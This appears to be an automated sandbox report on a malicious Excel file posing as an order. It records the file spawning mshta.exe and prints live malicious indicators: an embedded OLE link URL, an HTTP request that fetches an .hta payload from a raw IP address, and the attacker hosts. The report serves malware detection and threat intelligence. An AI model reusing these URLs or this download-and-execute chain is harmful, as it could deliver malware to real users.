Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nuevo-orden.xla.xlsx

Overview

General Information

Sample name:Nuevo-orden.xla.xlsx
Analysis ID:1586900
MD5:3851138774f61b2de118337f4c787f57
SHA1:5550ce43b2bf41ba056404a0924e458e3954af80
SHA256:2b14225a0e97081a7142e16423136b06c17cea24ed34b9e696864823468d7dfc
Tags:xlsxuser-threatinte1
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 8152 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 2688 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2872 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 8152, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 4632, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8152, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49753, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8152, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Nuevo-orden.xla.xlsxReversingLabs: Detection: 18%
Source: Nuevo-orden.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49753 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 192.3.27.144:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 75MB
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewIP Address: 192.3.27.144 192.3.27.144
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: Nuevo-orden.xla.xlsxString found in binary or memory: https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49753 version: TLS 1.2

System Summary

barindex
Source: Nuevo-orden.xla.xlsxOLE: Microsoft Excel 2007+
Source: Nuevo-orden.xla.xlsxOLE: Microsoft Excel 2007+
Source: Nuevo-orden.xla.xlsxOLE indicator, VBA macros: true
Source: Nuevo-orden.xla.xlsxStream path 'MBD0020109C/\x1Ole' : https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage& \04`_'E_&M_Mhtti:1QU]7@$%}Vcy7QGX2Lgk5fujICzf4aJnOU5sNqfxeFvh6Amql5vXpSCcaePH56b423B8Zbt1b8Ddgtqy9ETfqCvGm4kPhkOJqPrwSm0538cQBXIH0TIiXh5F7071RDVRjVOk0LiZ0lvD8jk8Uq0vCIt4PYuef7pK7RjTmEk0oTZhoqH1AdrxxMoHYud3ZkHzjiVbS7628GnAR90J2Wj8unMP6bDpK)C!`w_}fcK^}Ou
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'nuevo-orden.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal64.expl.winXLSX@6/4@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Nuevo-orden.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{2F2DE979-0DCA-4A44-982C-491AA2C44035} - OProcSessId.datJump to behavior
Source: Nuevo-orden.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Nuevo-orden.xla.xlsxReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Nuevo-orden.xla.xlsxStatic file information: File size 1091584 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Nuevo-orden.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
